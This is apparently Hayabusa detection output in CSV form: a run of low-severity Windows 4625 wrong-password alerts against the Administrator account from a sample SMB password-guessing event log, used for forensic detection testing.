2016-09-20 01:50:32.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fm65jq9tRQznmWPh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zd8BJbXvEoaDADLc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P0JlFw7S6jFUt4Iy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rfMbFXQcP5sA2wmf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xu4pgyCcDjl9h0Et : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B00w8dZG3sT2Lsqo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.450 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8aKGq6qrchp4SLvT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.568 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XnScYHBCKOSHItsi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r8UMBM326M7a4njd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kTdYWOi6p7etRfya : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.691 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JWSlcEVzj5lGtVg0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xc77wukLTPOYAzj2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w4WmTwTGuwDN6YXn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aeN4cSffFA04oOje : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eYFPV1kGALqX8jyO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qIlhxT4qqo5bCsU3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: btoOskH0112h7MTO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nWUhQJBcS7XbMJUq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E70qmXDDWqmWJjyU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oX0L8wf6nt2grLvn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0D8BwniiXsjfkYqE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sSWYo4mphuvKHQHl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: im8an1mDle9f8skd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aOyLWd5CAAjnJt3C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.240 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s7gI55uWlshCLw3y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l7UogJ8bBw6Epbht : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qIl0QRFHXCVAHWdV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OxPv9v4TxFvS9JMy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uHMGfCorrLXpDyeD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KQTKgFibIa8NWExO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.492 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rEnx3upH3Om0wHn7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KlNbW1ljPSTdgUKY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w2WMd3HugfjSwJPJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yEy0C6dMhysbNDrX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vxlayd8pnAZ3dZ2Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PhKO1jyWqVEdC9w2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.736 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dAH2mHJ4ZK5GS2p0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lV2ZIWGGwlkyEMRB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.811 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sum2yMFio9KLwZk5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fICXSRvv9Vm0uVpY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.894 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IgrOk6Fjp0QtfJ3i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OPKoHLtxNoiG65sl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NctXRH1DR3slfVxQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vLnAs36K1mTivu2w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H7crZQ0eQ5RDNIp7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yHjgGhEtZgNwjaii : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y5gi2SS2mQiDylQ8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kqWJGguiWBEplJiZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RWP4luPa3lFolQVI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5K9DQWbzslRZZMSC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5qm0L113v24jlfjx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.360 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: seuUjyGmNlyYT4tU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FljAF4LWLmWNa3kL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.447 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RnN5mBOaAvYu25G7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: llBt31S46QVzg0Ki : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b1rvJUZo91Kka0G1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7Zqi86ZSFGRnoFM4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GeyeVdCUmHEKxR8f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DwxJVXt79KBZalqS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TDfRu1OTlHmyc38P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OLCAMPDWti9hjHtV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.833 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k2eViuJeorX2peGP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: davOE9p1fF2LbDP7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.922 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YFQsEbZnm94eSuUl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UnNcBIPoWdJH0x7M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.997 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8Fw1xVFyar0Cal2J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.040 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FWzn4Oa8PQdH9Gqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b68beIB5BKyMv8d3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HeXSJhEXzpiRX8BT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.169 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BQ8Zu7ByLWddD4Tk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: paQzUptV8scmJvsG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.234 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WQLsoIX9LPvbockz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xRYbdVMbUlqFK8oM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OSO730O1fxDL4DfQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5wmniv339HLGKB4u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
